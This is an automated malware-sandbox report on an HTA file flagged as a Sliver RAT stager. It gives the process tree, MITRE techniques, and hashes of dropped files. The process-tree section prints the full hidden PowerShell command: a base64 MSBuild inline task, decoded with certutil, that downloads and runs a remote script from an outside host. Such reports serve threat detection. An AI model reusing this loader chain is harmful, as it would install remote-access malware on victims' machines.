Analysis

  • max time kernel
    117s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2024 02:22

General

  • Target

    3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta

  • Size

    3KB

  • MD5

    f46e78d3864aae68f2b8e83af27b9cf3

  • SHA1

    51d75c93a4d06327f172d41c797ecc99a8ba309a

  • SHA256

    3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

  • SHA512

    e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Malware Config

Signatures

  • Sliver RAT v2 6 IoCs
  • Sliver family
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Payload decoded via CertUtil.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\certutil.exe
        "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
        3⤵
        • Deobfuscate/Decode Files or Information
        • System Location Discovery: System Language Discovery
        PID:2736
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp" "c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP"
            5⤵
              PID:2428
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1468
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp" "c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP"
              5⤵
                PID:2644
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1988
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB85.tmp" "c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP"
                5⤵
                  PID:1656

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RESB85.tmp

          Filesize

          1KB

          MD5

          b636d93d946eda16360d07ac4f32cb57

          SHA1

          185fa4c867b340e3b626b07b7da121fad583bbf4

          SHA256

          ef537566c040cdd0156c273971e5f2775ff7c35d609a8f9938030e9b06c7c463

          SHA512

          f9d800accdb5e7795415947461b2171925574f60f24344c3b3e0051f03b5b7fb72ca8848ffe673688498bdfbed67514e62878b440bf88377447254470f4c456f

        • C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp

          Filesize

          1KB

          MD5

          059d763978f44394a96d790ad381d627

          SHA1

          84de0891b9d1a612a43329f4b4fa89c942c20f47

          SHA256

          2f43601dd30182474d7bece67a2dfc1e3cd6f330b63265052939e29067222111

          SHA512

          7df372ee7681acc29c3ccd9296978d203f8b341e1ecbdf7132a3d72d94e6dd5c683299a90363d34aae41824789125907d2941e483dfd465c2bb524318de97045

        • C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp

          Filesize

          1KB

          MD5

          6f721db86ac76182ff58fb910c5fc239

          SHA1

          08680448b5ba8b8fdac1a328e19ef6eeabedc0c4

          SHA256

          06bcb64a29cf6a1e19900a545a42cd7eb02ac690ec5cccb3232909dc3a308aab

          SHA512

          b7bb8535b61a82e33a70961586349bbf9b4212c0f302b4bf6492c8f11e67b2ca8c32b8154375b4dc17890405672c4935796ae6de8b1cf8483611900305124423

        • C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.dll

          Filesize

          4KB

          MD5

          e83111bed19fbb1fa6dd36225ca675a6

          SHA1

          d3838a0d5a521be5543b2a133662e984bba522b0

          SHA256

          0c460779934a8e1d9743aa7ae75ef8a21b8d23705fb068b7108bb890650ba634

          SHA512

          a12ca11ddd160d10c81f31d1b39999c10d268dac513b7cda4e0a1f794228bc05daff89b68fe348c9e5bb53e5927d15b9e9fc722344352cd858d6996953aa22ca

        • C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.pdb

          Filesize

          7KB

          MD5

          27e70ee56180654ecd7cbaa1020af339

          SHA1

          6cdade9cff518a10a71b107b7f7b2b445416f661

          SHA256

          492ba14f8a06a48874e86f703085787a155a5047de5451237473ad385ade7c8c

          SHA512

          b1c2730c118f8a9aaa618922c26a4af156ce28a3f32b617fc2f0f071f8223a37d0bcf525f816bad590d941c49282d2e8cd0d9a8160895314674a51bb81ee19a6

        • C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.dll

          Filesize

          4KB

          MD5

          6e6d7a9f1bfd1acf7fc9642cc26689d1

          SHA1

          5e5b061a5fd527d0abc579b007ddd3c79ebb6adb

          SHA256

          2fc27e006527cd3c08ace32420447c47f7404eee78ca10cf4b635166bd609ce8

          SHA512

          6f28086b9d486f1f1a22ed7ab3b2a63e3678784527bfa200cf8af084677eeda7616446ccbb1791f2478af5a405d8193428c710ca6579dabf5e556b90ff68fa8d

        • C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.pdb

          Filesize

          11KB

          MD5

          f90a0868fac538a2e1774f077a60b787

          SHA1

          a0e8d2d95dd6d234bd306f2469a002f3ae1a8b16

          SHA256

          e183acb064d051a7b8ed45e55ba53b6d1fdaca056b73a12593ebe2af55ba88a0

          SHA512

          d2f3720ae12c930743886615016e8dbb3864231a6c7acc310509c79fb3b136302a33511e630f2a444ce8704167873c63c184bc20d0a735146b9341d65c0c47d9

        • C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.dll

          Filesize

          4KB

          MD5

          114b1beeb338159cf8e10d252edf88c7

          SHA1

          35e52e4d532240156e9d67553c5c49f12056484e

          SHA256

          87dbf0b68a17d040d0214327badaf9e52a853bb39fed1dda970ffdf21916b883

          SHA512

          80b12face81b75a64d86f3e268eee55cf9eb9c8887d951fd7aea87cabe215ae2b4cd61bfff0451e4f9e44c5fd6edebee26de9329ac18879f52371066d1cfe010

        • C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.pdb

          Filesize

          11KB

          MD5

          8e5d9e2a3d80b8bb75538a1a10866e0e

          SHA1

          930e6f5a91ce56cd53cbda562441fe4319ff300f

          SHA256

          5cfb07bab99cd1130285b1cb776832f2a7c7a0e47f88044d8925048f1a54a118

          SHA512

          113af6496ccc90e744d4711f82859a7910220aae04ec7507bc5f0238d77d5ec68b87a0b7df3c5e2572dc6d3e095378fbd853db3f85b1883151236129066253fa

        • C:\windows\temp\d.xml

          Filesize

          2KB

          MD5

          6c2a8d820d8d80182aacdc125399cd71

          SHA1

          51ccd1e0c3247bf24da813a1f660a367f8deefc8

          SHA256

          104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

          SHA512

          c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

        • \??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP

          Filesize

          652B

          MD5

          e1311619232894838c587e794d5a9f2c

          SHA1

          4dbeeeb7662e00f32d8ad8eab5dda3056cf10c73

          SHA256

          2824ac96ff847775d2e48a47932dba3e3abb628336148bb203efe096df10231e

          SHA512

          6b92fd135368304b03bec4410d7209d0b1591f7b93e93450a50f85c2a2bf657d05e4e12eecda127d06dc9eea124692b2370e43aa73c1cd9c7911db27e85cbb54

        • \??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.0.cs

          Filesize

          611B

          MD5

          9dc0e32c32d7b3cfd2f819d8c0e4c7a5

          SHA1

          267cb8f96e02e298033786efd8ee6d87a73418a3

          SHA256

          67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

          SHA512

          c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

        • \??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline

          Filesize

          327B

          MD5

          d6bf783d5c8706d2fd004bd7ec151497

          SHA1

          cba5d782d2ff529c482f82676a5ab9ca8c493cc1

          SHA256

          ef7b625aa1fd1982b688a98eb869d15fbc684433b536aa5a27a1be057f1fb2f6

          SHA512

          38369968fdcfc0a7a91e9ee94e272aaa6072c9ddf8eaf3111279d1834d5d9855b249bcde60a6370f37a512d824bc2f888a95ae002b572ab7e7a6ab740f4c20d8

        • \??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP

          Filesize

          652B

          MD5

          975f3db8ad310f8d07485ba6057627e6

          SHA1

          cce9dd7d85017ffe31754fbdecf123a63ad808f6

          SHA256

          c7b56885f11e8cbadcf0dec084d735f6ef99efa3b9b385a6f8715c911e1a6468

          SHA512

          8d9101d42d27cff6e494864637da73806154d1dd7539cc65e6872e12af6137a24b2bde904e306168e5b3366f25d9c8cbaad96ec9603e2bbf1b67d523bfb89cdd

        • \??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.0.cs

          Filesize

          1KB

          MD5

          4a4ff4a5e71cabe4864c862a697c1e27

          SHA1

          b95fb7438213c3ae9caf0e8b52bb301fefcddb56

          SHA256

          70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

          SHA512

          7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

        • \??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline

          Filesize

          660B

          MD5

          7f7ea98b7ffefa4148339e022deb1421

          SHA1

          f45f37a4cf471a061a103e2eeb8ebbfc9beaa88f

          SHA256

          a1a3b9ae46c66e548cb34772fe28f0ebc7b4bd00099f18f95b9e99cfab2dd5b1

          SHA512

          931b879bbe85d9979e9b529fe3d55b236b40f0b66b0c8a57920f6cb426d6711c17d6b50407552b41127d838cef05688df50ff5defdec2c814b3349f9dbca177b

        • \??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP

          Filesize

          652B

          MD5

          13b2b8337c041860a14830209cb53120

          SHA1

          87ee1495ad526e3b6ca041817f456b25d839165b

          SHA256

          87f90cd0a8588c37bb9ca26dcada8b5eda5de60d44b9e1e678c80aa463ab4319

          SHA512

          fd73168e1b6a7e53e7c7ed279b1e82a46fdf079333fbf2d9e292cd651d62d3393eddffa37a7403466068dcaeb1c9b6462abc28303f98c812c5fe9125ffa988eb

        • \??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.0.cs

          Filesize

          1KB

          MD5

          da1f4b7b1a87cc475dfa05923b6301a0

          SHA1

          0e2ff764c519bc8169b66437857f01e25676e343

          SHA256

          624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

          SHA512

          d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

        • \??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline

          Filesize

          782B

          MD5

          189b7ea288b96a9f01cba2cf2aa9d4ff

          SHA1

          32380e5f74f961044e172f3487e9f103e3016a92

          SHA256

          803f01022b445b4b603876e53b6b7af17bad6f703575566bf2fa0003614edd16

          SHA512

          bc5e7be4cd5111a16c9abb7b29509556d3801cc903e31b8dfb68864de60c60272e9d637b773c2699ff8123ceae0392361ae3a1880ff06bdcf81a946d1c73166f

        • \??\c:\windows\temp\enc3.txt

          Filesize

          6KB

          MD5

          940ed0fa0b1fc8ed6fbf279ab67af56f

          SHA1

          da4b7c40029542659f025ae74fa0be0fb0fa473c

          SHA256

          731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

          SHA512

          934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

        • memory/2608-54-0x0000000002220000-0x0000000002254000-memory.dmp

          Filesize

          208KB

        • memory/2608-58-0x000000001C2E0000-0x000000001C402000-memory.dmp

          Filesize

          1.1MB

        • memory/2608-32-0x000000001C2E0000-0x000000001C402000-memory.dmp

          Filesize

          1.1MB

        • memory/2608-30-0x00000000008B0000-0x00000000008B8000-memory.dmp

          Filesize

          32KB

        • memory/2608-14-0x000000001C2E0000-0x000000001C45A000-memory.dmp

          Filesize

          1.5MB

        • memory/2608-13-0x00000000008B0000-0x00000000008CA000-memory.dmp

          Filesize

          104KB

        • memory/2608-12-0x00000000008B0000-0x00000000008F4000-memory.dmp

          Filesize

          272KB

        • memory/2608-48-0x00000000008C0000-0x00000000008C8000-memory.dmp

          Filesize

          32KB

        • memory/2608-50-0x00000000008D0000-0x00000000008EC000-memory.dmp

          Filesize

          112KB

        • memory/2608-51-0x0000000000A80000-0x0000000000AC8000-memory.dmp

          Filesize

          288KB

        • memory/2608-52-0x00000000008F0000-0x00000000008F8000-memory.dmp

          Filesize

          32KB

        • memory/2608-53-0x000000001BDB0000-0x000000001BE56000-memory.dmp

          Filesize

          664KB

        • memory/2608-15-0x000000001D2C0000-0x000000001D624000-memory.dmp

          Filesize

          3.4MB

        • memory/2608-55-0x0000000002260000-0x00000000022AA000-memory.dmp

          Filesize

          296KB

        • memory/2608-56-0x0000000000AD0000-0x0000000000AE6000-memory.dmp

          Filesize

          88KB

        • memory/2608-33-0x000000001E060000-0x000000001E342000-memory.dmp

          Filesize

          2.9MB

        • memory/2608-57-0x000000001C2E0000-0x000000001C402000-memory.dmp

          Filesize

          1.1MB

        • memory/2608-59-0x000000001E550000-0x000000001E60A000-memory.dmp

          Filesize

          744KB

        • memory/2608-11-0x00000000005F0000-0x0000000000634000-memory.dmp

          Filesize

          272KB

        • memory/2608-10-0x000000001C860000-0x000000001C982000-memory.dmp

          Filesize

          1.1MB

        • memory/2608-9-0x000000001C2E0000-0x000000001C402000-memory.dmp

          Filesize

          1.1MB

        • memory/2608-7-0x000000001ADE0000-0x000000001AF3A000-memory.dmp

          Filesize

          1.4MB

        • memory/2608-74-0x00000000022B0000-0x00000000022B8000-memory.dmp

          Filesize

          32KB

        • memory/2608-6-0x0000000000140000-0x000000000015A000-memory.dmp

          Filesize

          104KB

        • memory/2608-5-0x000000013F3D0000-0x000000013F40E000-memory.dmp

          Filesize

          248KB

        • memory/2608-76-0x0000000020D40000-0x00000000217BB000-memory.dmp

          Filesize

          10.5MB

        • memory/2608-77-0x0000000022240000-0x0000000022D24000-memory.dmp

          Filesize

          10.9MB

        • memory/2608-79-0x0000000022240000-0x0000000022D24000-memory.dmp

          Filesize

          10.9MB

        • memory/2608-78-0x0000000022240000-0x0000000022D24000-memory.dmp

          Filesize

          10.9MB

        • memory/2608-80-0x0000000022240000-0x0000000022D24000-memory.dmp

          Filesize

          10.9MB

        • memory/2608-84-0x0000000022240000-0x0000000022D24000-memory.dmp

          Filesize

          10.9MB